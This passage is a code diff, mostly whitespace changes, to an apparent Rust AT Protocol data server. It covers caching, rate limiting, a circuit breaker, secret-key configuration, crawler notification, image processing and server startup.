··· 2 2 use base64::{Engine as _, engine::general_purpose::STANDARD as BASE64}; 3 3 use std::sync::Arc; 4 4 use std::time::Duration; 5 + 5 6 #[derive(Debug, thiserror::Error)] 6 7 pub enum CacheError { 7 8 #[error("Cache connection error: {0}")] ··· 9 10 #[error("Serialization error: {0}")] 10 11 Serialization(String), 11 12 } 13 + 12 14 #[async_trait] 13 15 pub trait Cache: Send + Sync { 14 16 async fn get(&self, key: &str) -> Option<String>; ··· 22 24 self.set(key, &encoded, ttl).await 23 25 } 24 26 } 27 + 25 28 #[derive(Clone)] 26 29 pub struct ValkeyCache { 27 30 conn: redis::aio::ConnectionManager, 28 31 } 32 + 29 33 impl ValkeyCache { 30 34 pub async fn new(url: &str) -> Result<Self, CacheError> { 31 35 let client = redis::Client::open(url) ··· 36 40 .map_err(|e| CacheError::Connection(e.to_string()))?; 37 41 Ok(Self { conn: manager }) 38 42 } 43 + 39 44 pub fn connection(&self) -> redis::aio::ConnectionManager { 40 45 self.conn.clone() 41 46 } 42 47 } 48 + 43 49 #[async_trait] 44 50 impl Cache for ValkeyCache { 45 51 async fn get(&self, key: &str) -> Option<String> { ··· 51 57 .ok() 52 58 .flatten() 53 59 } 60 + 54 61 async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> { 55 62 let mut conn = self.conn.clone(); 56 63 redis::cmd("SET") ··· 62 69 .await 63 70 .map_err(|e| CacheError::Connection(e.to_string())) 64 71 } 72 + 65 73 async fn delete(&self, key: &str) -> Result<(), CacheError> { 66 74 let mut conn = self.conn.clone(); 67 75 redis::cmd("DEL") ··· 71 79 .map_err(|e| CacheError::Connection(e.to_string())) 72 80 } 73 81 } 82 + 74 83 pub struct NoOpCache; 84 + 75 85 #[async_trait] 76 86 impl Cache for NoOpCache { 77 87 async fn get(&self, _key: &str) -> Option<String> { 78 88 None 79 89 } 90 + 80 91 async fn set(&self, _key: &str, _value: &str, _ttl: Duration) -> Result<(), CacheError> { 81 92 Ok(()) 82 93 } 94 + 83 95 async fn delete(&self, _key: &str) -> Result<(), CacheError> { 84 96 Ok(()) 85 97 } 86 98 } 99 + 87 100 #[async_trait] 88 101 pub trait DistributedRateLimiter: Send + Sync { 89 102 async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool; 90 103 } 104 + 91 105 #[derive(Clone)] 92 106 pub struct RedisRateLimiter { 93 107 conn: redis::aio::ConnectionManager, 94 108 } 109 + 95 110 impl RedisRateLimiter { 96 111 pub fn new(conn: redis::aio::ConnectionManager) -> Self { 97 112 Self { conn } 98 113 } 99 114 } 115 + 100 116 #[async_trait] 101 117 impl DistributedRateLimiter for RedisRateLimiter { 102 118 async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool { ··· 124 140 count <= limit as i64 125 141 } 126 142 } 143 + 127 144 pub struct NoOpRateLimiter; 145 + 128 146 #[async_trait] 129 147 impl DistributedRateLimiter for NoOpRateLimiter { 130 148 async fn check_rate_limit(&self, _key: &str, _limit: u32, _window_ms: u64) -> bool { 131 149 true 132 150 } 133 151 } 152 + 134 153 pub enum CacheBackend { 135 154 Valkey(ValkeyCache), 136 155 NoOp, 137 156 } 157 + 138 158 impl CacheBackend { 139 159 pub fn rate_limiter(&self) -> Arc<dyn DistributedRateLimiter> { 140 160 match self { ··· 145 165 } 146 166 } 147 167 } 168 + 148 169 #[async_trait] 149 170 impl Cache for CacheBackend { 150 171 async fn get(&self, key: &str) -> Option<String> { ··· 153 174 CacheBackend::NoOp => None, 154 175 } 155 176 } 177 + 156 178 async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> { 157 179 match self { 158 180 CacheBackend::Valkey(c) => c.set(key, value, ttl).await, 159 181 CacheBackend::NoOp => Ok(()), 160 182 } 161 183 } 184 + 162 185 async fn delete(&self, key: &str) -> Result<(), CacheError> { 163 186 match self { 164 187 CacheBackend::Valkey(c) => c.delete(key).await, ··· 166 189 } 167 190 } 168 191 } 192 + 169 193 pub async fn create_cache() -> (Arc<dyn Cache>, Arc<dyn DistributedRateLimiter>) { 170 194 match std::env::var("VALKEY_URL") { 171 195 Ok(url) => match ValkeyCache::new(&url).await {
+45
src/circuit_breaker.rs
··· 2 2 use std::sync::Arc; 3 3 use std::time::Duration; 4 4 use tokio::sync::RwLock; 5 + 5 6 #[derive(Debug, Clone, Copy, PartialEq, Eq)] 6 7 pub enum CircuitState { 7 8 Closed, 8 9 Open, 9 10 HalfOpen, 10 11 } 12 + 11 13 pub struct CircuitBreaker { 12 14 name: String, 13 15 failure_threshold: u32, ··· 18 20 success_count: AtomicU32, 19 21 last_failure_time: AtomicU64, 20 22 } 23 + 21 24 impl CircuitBreaker { 22 25 pub fn new(name: &str, failure_threshold: u32, success_threshold: u32, timeout_secs: u64) -> Self { 23 26 Self { ··· 31 34 last_failure_time: AtomicU64::new(0), 32 35 } 33 36 } 37 + 34 38 pub async fn can_execute(&self) -> bool { 35 39 let state = self.state.read().await; 40 + 36 41 match *state { 37 42 CircuitState::Closed => true, 38 43 CircuitState::Open => { ··· 41 46 .duration_since(std::time::UNIX_EPOCH) 42 47 .unwrap() 43 48 .as_secs(); 49 + 44 50 if now - last_failure >= self.timeout.as_secs() { 45 51 drop(state); 46 52 let mut state = self.state.write().await; ··· 56 62 CircuitState::HalfOpen => true, 57 63 } 58 64 } 65 + 59 66 pub async fn record_success(&self) { 60 67 let state = *self.state.read().await; 68 + 61 69 match state { 62 70 CircuitState::Closed => { 63 71 self.failure_count.store(0, Ordering::SeqCst); ··· 75 83 CircuitState::Open => {} 76 84 } 77 85 } 86 + 78 87 pub async fn record_failure(&self) { 79 88 let state = *self.state.read().await; 89 + 80 90 match state { 81 91 CircuitState::Closed => { 82 92 let count = self.failure_count.fetch_add(1, Ordering::SeqCst) + 1; ··· 110 120 CircuitState::Open => {} 111 121 } 112 122 } 123 + 113 124 pub async fn state(&self) -> CircuitState { 114 125 *self.state.read().await 115 126 } 127 + 116 128 pub fn name(&self) -> &str { 117 129 &self.name 118 130 } 119 131 } 132 + 120 133 #[derive(Clone)] 121 134 pub struct CircuitBreakers { 122 135 pub plc_directory: Arc<CircuitBreaker>, 123 136 pub relay_notification: Arc<CircuitBreaker>, 124 137 } 138 + 125 139 impl Default for CircuitBreakers { 126 140 fn default() -> Self { 127 141 Self::new() 128 142 } 129 143 } 144 + 130 145 impl CircuitBreakers { 131 146 pub fn new() -> Self { 132 147 Self { ··· 135 150 } 136 151 } 137 152 } 153 + 138 154 #[derive(Debug)] 139 155 pub struct CircuitOpenError { 140 156 pub circuit_name: String, 141 157 } 158 + 142 159 impl std::fmt::Display for CircuitOpenError { 143 160 fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { 144 161 write!(f, "Circuit breaker '{}' is open", self.circuit_name) 145 162 } 146 163 } 164 + 147 165 impl std::error::Error for CircuitOpenError {} 166 + 148 167 pub async fn with_circuit_breaker<T, E, F, Fut>( 149 168 circuit: &CircuitBreaker, 150 169 operation: F, ··· 158 177 circuit_name: circuit.name().to_string(), 159 178 })); 160 179 } 180 + 161 181 match operation().await { 162 182 Ok(result) => { 163 183 circuit.record_success().await; ··· 169 189 } 170 190 } 171 191 } 192 + 172 193 #[derive(Debug)] 173 194 pub enum CircuitBreakerError<E> { 174 195 CircuitOpen(CircuitOpenError), 175 196 OperationFailed(E), 176 197 } 198 + 177 199 impl<E: std::fmt::Display> std::fmt::Display for CircuitBreakerError<E> { 178 200 fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { 179 201 match self { ··· 182 204 } 183 205 } 184 206 } 207 + 185 208 impl<E: std::error::Error + 'static> std::error::Error for CircuitBreakerError<E> { 186 209 fn source(&self) -> Option<&(dyn std::error::Error + 'static)> { 187 210 match self { ··· 190 213 } 191 214 } 192 215 } 216 + 193 217 #[cfg(test)] 194 218 mod tests { 195 219 use super::*; 220 + 196 221 #[tokio::test] 197 222 async fn test_circuit_breaker_starts_closed() { 198 223 let cb = CircuitBreaker::new("test", 3, 2, 10); 199 224 assert_eq!(cb.state().await, CircuitState::Closed); 200 225 assert!(cb.can_execute().await); 201 226 } 227 + 202 228 #[tokio::test] 203 229 async fn test_circuit_breaker_opens_after_failures() { 204 230 let cb = CircuitBreaker::new("test", 3, 2, 10); 231 + 205 232 cb.record_failure().await; 206 233 assert_eq!(cb.state().await, CircuitState::Closed); 234 + 207 235 cb.record_failure().await; 208 236 assert_eq!(cb.state().await, CircuitState::Closed); 237 + 209 238 cb.record_failure().await; 210 239 assert_eq!(cb.state().await, CircuitState::Open); 211 240 assert!(!cb.can_execute().await); 212 241 } 242 + 213 243 #[tokio::test] 214 244 async fn test_circuit_breaker_success_resets_failures() { 215 245 let cb = CircuitBreaker::new("test", 3, 2, 10); 246 + 216 247 cb.record_failure().await; 217 248 cb.record_failure().await; 218 249 cb.record_success().await; 250 + 219 251 cb.record_failure().await; 220 252 cb.record_failure().await; 221 253 assert_eq!(cb.state().await, CircuitState::Closed); 254 + 222 255 cb.record_failure().await; 223 256 assert_eq!(cb.state().await, CircuitState::Open); 224 257 } 258 + 225 259 #[tokio::test] 226 260 async fn test_circuit_breaker_half_open_closes_after_successes() { 227 261 let cb = CircuitBreaker::new("test", 3, 2, 0); 262 + 228 263 for _ in 0..3 { 229 264 cb.record_failure().await; 230 265 } 231 266 assert_eq!(cb.state().await, CircuitState::Open); 267 + 232 268 tokio::time::sleep(Duration::from_millis(100)).await; 233 269 assert!(cb.can_execute().await); 234 270 assert_eq!(cb.state().await, CircuitState::HalfOpen); 271 + 235 272 cb.record_success().await; 236 273 assert_eq!(cb.state().await, CircuitState::HalfOpen); 274 + 237 275 cb.record_success().await; 238 276 assert_eq!(cb.state().await, CircuitState::Closed); 239 277 } 278 + 240 279 #[tokio::test] 241 280 async fn test_circuit_breaker_half_open_reopens_on_failure() { 242 281 let cb = CircuitBreaker::new("test", 3, 2, 0); 282 + 243 283 for _ in 0..3 { 244 284 cb.record_failure().await; 245 285 } 286 + 246 287 tokio::time::sleep(Duration::from_millis(100)).await; 247 288 cb.can_execute().await; 289 + 248 290 cb.record_failure().await; 249 291 assert_eq!(cb.state().await, CircuitState::Open); 250 292 } 293 + 251 294 #[tokio::test] 252 295 async fn test_with_circuit_breaker_helper() { 253 296 let cb = CircuitBreaker::new("test", 3, 2, 10); 297 + 254 298 let result: Result<i32, CircuitBreakerError<std::io::Error>> = 255 299 with_circuit_breaker(&cb, || async { Ok(42) }).await; 256 300 assert!(result.is_ok()); 257 301 assert_eq!(result.unwrap(), 42); 302 + 258 303 let result: Result<i32, CircuitBreakerError<&str>> = 259 304 with_circuit_breaker(&cb, || async { Err("error") }).await; 260 305 assert!(result.is_err());
+32
src/config.rs
··· 8 8 use p256::ecdsa::SigningKey; 9 9 use sha2::{Digest, Sha256}; 10 10 use std::sync::OnceLock; 11 + 11 12 static CONFIG: OnceLock<AuthConfig> = OnceLock::new(); 13 + 12 14 pub const ENCRYPTION_VERSION: i32 = 1; 15 + 13 16 pub struct AuthConfig { 14 17 jwt_secret: String, 15 18 dpop_secret: String, ··· 20 23 pub signing_key_y: String, 21 24 key_encryption_key: [u8; 32], 22 25 } 26 + 23 27 impl AuthConfig { 24 28 pub fn init() -> &'static Self { 25 29 CONFIG.get_or_init(|| { ··· 33 37 ); 34 38 } 35 39 }); 40 + 36 41 let dpop_secret = std::env::var("DPOP_SECRET").unwrap_or_else(|_| { 37 42 if cfg!(test) || std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_ok() { 38 43 "test-dpop-secret-not-for-production".to_string() ··· 43 48 ); 44 49 } 45 50 }); 51 + 46 52 if jwt_secret.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() { 47 53 panic!("JWT_SECRET must be at least 32 characters"); 48 54 } 55 + 49 56 if dpop_secret.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() { 50 57 panic!("DPOP_SECRET must be at least 32 characters"); 51 58 } 59 + 52 60 let mut hasher = Sha256::new(); 53 61 hasher.update(b"oauth-signing-key-derivation:"); 54 62 hasher.update(jwt_secret.as_bytes()); 55 63 let seed = hasher.finalize(); 64 + 56 65 let signing_key = SigningKey::from_slice(&seed) 57 66 .unwrap_or_else(|e| panic!("Failed to create signing key from seed: {}. This is a bug.", e)); 67 + 58 68 let verifying_key = signing_key.verifying_key(); 59 69 let point = verifying_key.to_encoded_point(false); 70 + 60 71 let signing_key_x = URL_SAFE_NO_PAD.encode( 61 72 point.x().expect("EC point missing X coordinate - this should never happen") 62 73 ); 63 74 let signing_key_y = URL_SAFE_NO_PAD.encode( 64 75 point.y().expect("EC point missing Y coordinate - this should never happen") 65 76 ); 77 + 66 78 let mut kid_hasher = Sha256::new(); 67 79 kid_hasher.update(signing_key_x.as_bytes()); 68 80 kid_hasher.update(signing_key_y.as_bytes()); 69 81 let kid_hash = kid_hasher.finalize(); 70 82 let signing_key_id = URL_SAFE_NO_PAD.encode(&kid_hash[..8]); 83 + 71 84 let master_key = std::env::var("MASTER_KEY").unwrap_or_else(|_| { 72 85 if cfg!(test) || std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_ok() { 73 86 "test-master-key-not-for-production".to_string() ··· 78 91 ); 79 92 } 80 93 }); 94 + 81 95 if master_key.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() { 82 96 panic!("MASTER_KEY must be at least 32 characters"); 83 97 } 98 + 84 99 let hk = Hkdf::<Sha256>::new(None, master_key.as_bytes()); 85 100 let mut key_encryption_key = [0u8; 32]; 86 101 hk.expand(b"bspds-user-key-encryption", &mut key_encryption_key) 87 102 .expect("HKDF expansion failed"); 103 + 88 104 AuthConfig { 89 105 jwt_secret, 90 106 dpop_secret, ··· 96 112 } 97 113 }) 98 114 } 115 + 99 116 pub fn get() -> &'static Self { 100 117 CONFIG.get().expect("AuthConfig not initialized - call AuthConfig::init() first") 101 118 } 119 + 102 120 pub fn jwt_secret(&self) -> &str { 103 121 &self.jwt_secret 104 122 } 123 + 105 124 pub fn dpop_secret(&self) -> &str { 106 125 &self.dpop_secret 107 126 } 127 + 108 128 pub fn encrypt_user_key(&self, plaintext: &[u8]) -> Result<Vec<u8>, String> { 109 129 use rand::RngCore; 130 + 110 131 let cipher = Aes256Gcm::new_from_slice(&self.key_encryption_key) 111 132 .map_err(|e| format!("Failed to create cipher: {}", e))?; 133 + 112 134 let mut nonce_bytes = [0u8; 12]; 113 135 rand::thread_rng().fill_bytes(&mut nonce_bytes); 136 + 114 137 #[allow(deprecated)] 115 138 let nonce = Nonce::from_slice(&nonce_bytes); 139 + 116 140 let ciphertext = cipher 117 141 .encrypt(nonce, plaintext) 118 142 .map_err(|e| format!("Encryption failed: {}", e))?; 143 + 119 144 let mut result = Vec::with_capacity(12 + ciphertext.len()); 120 145 result.extend_from_slice(&nonce_bytes); 121 146 result.extend_from_slice(&ciphertext); 147 + 122 148 Ok(result) 123 149 } 150 + 124 151 pub fn decrypt_user_key(&self, encrypted: &[u8]) -> Result<Vec<u8>, String> { 125 152 if encrypted.len() < 12 { 126 153 return Err("Encrypted data too short".to_string()); 127 154 } 155 + 128 156 let cipher = Aes256Gcm::new_from_slice(&self.key_encryption_key) 129 157 .map_err(|e| format!("Failed to create cipher: {}", e))?; 158 + 130 159 #[allow(deprecated)] 131 160 let nonce = Nonce::from_slice(&encrypted[..12]); 132 161 let ciphertext = &encrypted[12..]; 162 + 133 163 cipher 134 164 .decrypt(nonce, ciphertext) 135 165 .map_err(|e| format!("Decryption failed: {}", e)) 136 166 } 137 167 } 168 + 138 169 pub fn encrypt_key(plaintext: &[u8]) -> Result<Vec<u8>, String> { 139 170 AuthConfig::get().encrypt_user_key(plaintext) 140 171 } 172 + 141 173 pub fn decrypt_key(encrypted: &[u8], version: Option<i32>) -> Result<Vec<u8>, String> { 142 174 match version.unwrap_or(0) { 143 175 0 => Ok(encrypted.to_vec()),
+19
src/crawlers.rs
··· 6 6 use std::time::Duration; 7 7 use tokio::sync::{broadcast, watch}; 8 8 use tracing::{debug, error, info, warn}; 9 + 9 10 const NOTIFY_THRESHOLD_SECS: u64 = 20 * 60; 11 + 10 12 pub struct Crawlers { 11 13 hostname: String, 12 14 crawler_urls: Vec<String>, ··· 14 16 last_notified: AtomicU64, 15 17 circuit_breaker: Option<Arc<CircuitBreaker>>, 16 18 } 19 + 17 20 impl Crawlers { 18 21 pub fn new(hostname: String, crawler_urls: Vec<String>) -> Self { 19 22 Self { ··· 27 30 circuit_breaker: None, 28 31 } 29 32 } 33 + 30 34 pub fn with_circuit_breaker(mut self, circuit_breaker: Arc<CircuitBreaker>) -> Self { 31 35 self.circuit_breaker = Some(circuit_breaker); 32 36 self 33 37 } 38 + 34 39 pub fn from_env() -> Option<Self> { 35 40 let hostname = std::env::var("PDS_HOSTNAME").ok()?; 41 + 36 42 let crawler_urls: Vec<String> = std::env::var("CRAWLERS") 37 43 .unwrap_or_default() 38 44 .split(',') 39 45 .filter(|s| !s.is_empty()) 40 46 .map(|s| s.trim().to_string()) 41 47 .collect(); 48 + 42 49 if crawler_urls.is_empty() { 43 50 return None; 44 51 } 52 + 45 53 Some(Self::new(hostname, crawler_urls)) 46 54 } 55 + 47 56 fn should_notify(&self) -> bool { 48 57 let now = std::time::SystemTime::now() 49 58 .duration_since(std::time::UNIX_EPOCH) 50 59 .unwrap_or_default() 51 60 .as_secs(); 61 + 52 62 let last = self.last_notified.load(Ordering::Relaxed); 53 63 now - last >= NOTIFY_THRESHOLD_SECS 54 64 } 65 + 55 66 fn mark_notified(&self) { 56 67 let now = std::time::SystemTime::now() 57 68 .duration_since(std::time::UNIX_EPOCH) 58 69 .unwrap_or_default() 59 70 .as_secs(); 71 + 60 72 self.last_notified.store(now, Ordering::Relaxed); 61 73 } 74 + 62 75 pub async fn notify_of_update(&self) { 63 76 if !self.should_notify() { 64 77 debug!("Skipping crawler notification due to debounce"); 65 78 return; 66 79 } 80 + 67 81 if let Some(cb) = &self.circuit_breaker { 68 82 if !cb.can_execute().await { 69 83 debug!("Skipping crawler notification due to circuit breaker open"); 70 84 return; 71 85 } 72 86 } 87 + 73 88 self.mark_notified(); 74 89 let circuit_breaker = self.circuit_breaker.clone(); 90 + 75 91 for crawler_url in &self.crawler_urls { 76 92 let url = format!("{}/xrpc/com.atproto.sync.requestCrawl", crawler_url.trim_end_matches('/')); 77 93 let hostname = self.hostname.clone(); 78 94 let client = self.http_client.clone(); 79 95 let cb = circuit_breaker.clone(); 96 + 80 97 tokio::spawn(async move { 81 98 match client 82 99 .post(&url) ··· 116 133 } 117 134 } 118 135 } 136 + 119 137 pub async fn start_crawlers_service( 120 138 crawlers: Arc<Crawlers>, 121 139 mut firehose_rx: broadcast::Receiver<SequencedEvent>, ··· 127 145 crawlers = ?crawlers.crawler_urls, 128 146 "Starting crawlers notification service" 129 147 ); 148 + 130 149 loop { 131 150 tokio::select! { 132 151 result = firehose_rx.recv() => {
+28 -1
src/image/mod.rs
··· 1 1 use image::{DynamicImage, ImageFormat, ImageReader, imageops::FilterType}; 2 2 use std::io::Cursor; 3 + 3 4 pub const THUMB_SIZE_FEED: u32 = 200; 4 5 pub const THUMB_SIZE_FULL: u32 = 1000; 6 + 5 7 #[derive(Debug, Clone)] 6 8 pub struct ProcessedImage { 7 9 pub data: Vec<u8>, ··· 9 11 pub width: u32, 10 12 pub height: u32, 11 13 } 14 + 12 15 #[derive(Debug, Clone)] 13 16 pub struct ImageProcessingResult { 14 17 pub original: ProcessedImage, 15 18 pub thumbnail_feed: Option<ProcessedImage>, 16 19 pub thumbnail_full: Option<ProcessedImage>, 17 20 } 21 + 18 22 #[derive(Debug, thiserror::Error)] 19 23 pub enum ImageError { 20 24 #[error("Failed to decode image: {0}")] ··· 32 36 #[error("File too large: {size} bytes exceeds maximum {max_size} bytes")] 33 37 FileTooLarge { size: usize, max_size: usize }, 34 38 } 35 - pub const DEFAULT_MAX_FILE_SIZE: usize = 10 * 1024 * 1024; // 10MB 39 + 40 + pub const DEFAULT_MAX_FILE_SIZE: usize = 10 * 1024 * 1024; 41 + 36 42 pub struct ImageProcessor { 37 43 max_dimension: u32, 38 44 max_file_size: usize, 39 45 output_format: OutputFormat, 40 46 generate_thumbnails: bool, 41 47 } 48 + 42 49 #[derive(Debug, Clone, Copy)] 43 50 pub enum OutputFormat { 44 51 WebP, ··· 46 53 Png, 47 54 Original, 48 55 } 56 + 49 57 impl Default for ImageProcessor { 50 58 fn default() -> Self { 51 59 Self { ··· 56 64 } 57 65 } 58 66 } 67 + 59 68 impl ImageProcessor { 60 69 pub fn new() -> Self { 61 70 Self::default() 62 71 } 72 + 63 73 pub fn with_max_dimension(mut self, max: u32) -> Self { 64 74 self.max_dimension = max; 65 75 self 66 76 } 77 + 67 78 pub fn with_max_file_size(mut self, max: usize) -> Self { 68 79 self.max_file_size = max; 69 80 self 70 81 } 82 + 71 83 pub fn with_output_format(mut self, format: OutputFormat) -> Self { 72 84 self.output_format = format; 73 85 self 74 86 } 87 + 75 88 pub fn with_thumbnails(mut self, generate: bool) -> Self { 76 89 self.generate_thumbnails = generate; 77 90 self 78 91 } 92 + 79 93 pub fn process(&self, data: &[u8], mime_type: &str) -> Result<ImageProcessingResult, ImageError> { 80 94 if data.len() > self.max_file_size { 81 95 return Err(ImageError::FileTooLarge { ··· 109 123 thumbnail_full, 110 124 }) 111 125 } 126 + 112 127 fn detect_format(&self, mime_type: &str, data: &[u8]) -> Result<ImageFormat, ImageError> { 113 128 match mime_type.to_lowercase().as_str() { 114 129 "image/jpeg" | "image/jpg" => Ok(ImageFormat::Jpeg), ··· 124 139 } 125 140 } 126 141 } 142 + 127 143 fn decode_image(&self, data: &[u8], format: ImageFormat) -> Result<DynamicImage, ImageError> { 128 144 let cursor = Cursor::new(data); 129 145 let reader = ImageReader::with_format(cursor, format); ··· 131 147 .decode() 132 148 .map_err(|e| ImageError::DecodeError(e.to_string())) 133 149 } 150 + 134 151 fn encode_image(&self, img: &DynamicImage) -> Result<ProcessedImage, ImageError> { 135 152 let (data, mime_type) = match self.output_format { 136 153 OutputFormat::WebP => { ··· 165 182 height: img.height(), 166 183 }) 167 184 } 185 + 168 186 fn generate_thumbnail(&self, img: &DynamicImage, max_size: u32) -> Result<ProcessedImage, ImageError> { 169 187 let (orig_width, orig_height) = (img.width(), img.height()); 170 188 let (new_width, new_height) = if orig_width > orig_height { ··· 177 195 let thumb = img.resize(new_width, new_height, FilterType::Lanczos3); 178 196 self.encode_image(&thumb) 179 197 } 198 + 180 199 pub fn is_supported_mime_type(mime_type: &str) -> bool { 181 200 matches!( 182 201 mime_type.to_lowercase().as_str(), 183 202 "image/jpeg" | "image/jpg" | "image/png" | "image/gif" | "image/webp" 184 203 ) 185 204 } 205 + 186 206 pub fn strip_exif(data: &[u8]) -> Result<Vec<u8>, ImageError> { 187 207 let format = image::guess_format(data) 188 208 .map_err(|e| ImageError::DecodeError(e.to_string()))?; ··· 196 216 Ok(buf) 197 217 } 198 218 } 219 + 199 220 #[cfg(test)] 200 221 mod tests { 201 222 use super::*; 223 + 202 224 fn create_test_image(width: u32, height: u32) -> Vec<u8> { 203 225 let img = DynamicImage::new_rgb8(width, height); 204 226 let mut buf = Vec::new(); 205 227 img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap(); 206 228 buf 207 229 } 230 + 208 231 #[test] 209 232 fn test_process_small_image() { 210 233 let processor = ImageProcessor::new(); ··· 213 236 assert!(result.thumbnail_feed.is_none()); 214 237 assert!(result.thumbnail_full.is_none()); 215 238 } 239 + 216 240 #[test] 217 241 fn test_process_large_image_generates_thumbnails() { 218 242 let processor = ImageProcessor::new(); ··· 227 251 assert!(full_thumb.width <= THUMB_SIZE_FULL); 228 252 assert!(full_thumb.height <= THUMB_SIZE_FULL); 229 253 } 254 + 230 255 #[test] 231 256 fn test_webp_conversion() { 232 257 let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP); ··· 234 259 let result = processor.process(&data, "image/png").unwrap(); 235 260 assert_eq!(result.original.mime_type, "image/webp"); 236 261 } 262 + 237 263 #[test] 238 264 fn test_reject_too_large() { 239 265 let processor = ImageProcessor::new().with_max_dimension(1000); ··· 241 267 let result = processor.process(&data, "image/png"); 242 268 assert!(matches!(result, Err(ImageError::TooLarge { .. }))); 243 269 } 270 + 244 271 #[test] 245 272 fn test_is_supported_mime_type() { 246 273 assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
+4 -1
src/lib.rs
··· 16 16 pub mod sync; 17 17 pub mod util; 18 18 pub mod validation; 19 + 19 20 use axum::{ 20 21 Router, 21 22 http::Method, ··· 25 26 use state::AppState; 26 27 use tower_http::cors::{Any, CorsLayer}; 27 28 use tower_http::services::{ServeDir, ServeFile}; 29 + 28 30 pub fn app(state: AppState) -> Router { 29 31 let router = Router::new() 30 32 .route("/metrics", get(metrics::metrics_handler)) ··· 358 360 .route("/.well-known/did.json", get(api::identity::well_known_did)) 359 361 .route("/.well-known/atproto-did", get(api::identity::well_known_atproto_did)) 360 362 .route("/u/{handle}/did.json", get(api::identity::user_did_doc)) 361 - // OAuth 2.1 endpoints 362 363 .route( 363 364 "/.well-known/oauth-protected-resource", 364 365 get(oauth::endpoints::oauth_protected_resource), ··· 402 403 .allow_headers(Any), 403 404 ) 404 405 .with_state(state); 406 + 405 407 let frontend_dir = std::env::var("FRONTEND_DIR") 406 408 .unwrap_or_else(|_| "./frontend/dist".to_string()); 409 + 407 410 if std::path::Path::new(&frontend_dir).join("index.html").exists() { 408 411 let index_path = format!("{}/index.html", frontend_dir); 409 412 let serve_dir = ServeDir::new(&frontend_dir)
+30
src/main.rs
··· 6 6 use std::sync::Arc; 7 7 use tokio::sync::watch; 8 8 use tracing::{error, info, warn}; 9 + 9 10 #[tokio::main] 10 11 async fn main() -> ExitCode { 11 12 dotenvy::dotenv().ok(); 12 13 tracing_subscriber::fmt::init(); 13 14 bspds::metrics::init_metrics(); 15 + 14 16 match run().await { 15 17 Ok(()) => ExitCode::SUCCESS, 16 18 Err(e) => { ··· 19 21 } 20 22 } 21 23 } 24 + 22 25 async fn run() -> Result<(), Box<dyn std::error::Error>> { 23 26 let database_url = std::env::var("DATABASE_URL") 24 27 .map_err(|_| "DATABASE_URL environment variable must be set")?; 28 + 25 29 let max_connections: u32 = std::env::var("DATABASE_MAX_CONNECTIONS") 26 30 .ok() 27 31 .and_then(|v| v.parse().ok()) 28 32 .unwrap_or(100); 33 + 29 34 let min_connections: u32 = std::env::var("DATABASE_MIN_CONNECTIONS") 30 35 .ok() 31 36 .and_then(|v| v.parse().ok()) 32 37 .unwrap_or(10); 38 + 33 39 let acquire_timeout_secs: u64 = std::env::var("DATABASE_ACQUIRE_TIMEOUT_SECS") 34 40 .ok() 35 41 .and_then(|v| v.parse().ok()) 36 42 .unwrap_or(10); 43 + 37 44 info!( 38 45 "Configuring database pool: max={}, min={}, acquire_timeout={}s", 39 46 max_connections, min_connections, acquire_timeout_secs 40 47 ); 48 + 41 49 let pool = sqlx::postgres::PgPoolOptions::new() 42 50 .max_connections(max_connections) 43 51 .min_connections(min_connections) ··· 47 55 .connect(&database_url) 48 56 .await 49 57 .map_err(|e| format!("Failed to connect to Postgres: {}", e))?; 58 + 50 59 sqlx::migrate!("./migrations") 51 60 .run(&pool) 52 61 .await 53 62 .map_err(|e| format!("Failed to run migrations: {}", e))?; 63 + 54 64 let state = AppState::new(pool.clone()).await; 55 65 bspds::sync::listener::start_sequencer_listener(state.clone()).await; 66 + 56 67 let (shutdown_tx, shutdown_rx) = watch::channel(false); 68 + 57 69 let mut notification_service = NotificationService::new(pool); 70 + 58 71 if let Some(email_sender) = EmailSender::from_env() { 59 72 info!("Email notifications enabled"); 60 73 notification_service = notification_service.register_sender(email_sender); 61 74 } else { 62 75 warn!("Email notifications disabled (MAIL_FROM_ADDRESS not set)"); 63 76 } 77 + 64 78 if let Some(discord_sender) = DiscordSender::from_env() { 65 79 info!("Discord notifications enabled"); 66 80 notification_service = notification_service.register_sender(discord_sender); 67 81 } 82 + 68 83 if let Some(telegram_sender) = TelegramSender::from_env() { 69 84 info!("Telegram notifications enabled"); 70 85 notification_service = notification_service.register_sender(telegram_sender); 71 86 } 87 + 72 88 if let Some(signal_sender) = SignalSender::from_env() { 73 89 info!("Signal notifications enabled"); 74 90 notification_service = notification_service.register_sender(signal_sender); 75 91 } 92 + 76 93 let notification_handle = tokio::spawn(notification_service.run(shutdown_rx.clone())); 94 + 77 95 let crawlers_handle = if let Some(crawlers) = Crawlers::from_env() { 78 96 let crawlers = Arc::new( 79 97 crawlers.with_circuit_breaker(state.circuit_breakers.relay_notification.clone()) ··· 85 103 warn!("Crawlers notification service disabled (PDS_HOSTNAME or CRAWLERS not set)"); 86 104 None 87 105 }; 106 + 88 107 let app = bspds::app(state); 89 108 let addr = SocketAddr::from(([127, 0, 0, 1], 3000)); 90 109 info!("listening on {}", addr); 110 + 91 111 let listener = tokio::net::TcpListener::bind(addr) 92 112 .await 93 113 .map_err(|e| format!("Failed to bind to {}: {}", addr, e))?; 114 + 94 115 let server_result = axum::serve(listener, app) 95 116 .with_graceful_shutdown(shutdown_signal(shutdown_tx)) 96 117 .await; 118 + 97 119 notification_handle.await.ok(); 120 + 98 121 if let Some(handle) = crawlers_handle { 99 122 handle.await.ok(); 100 123 } 124 + 101 125 if let Err(e) = server_result { 102 126 return Err(format!("Server error: {}", e).into()); 103 127 } 128 + 104 129 Ok(()) 105 130 } 131 + 106 132 async fn shutdown_signal(shutdown_tx: watch::Sender<bool>) { 107 133 let ctrl_c = async { 108 134 match 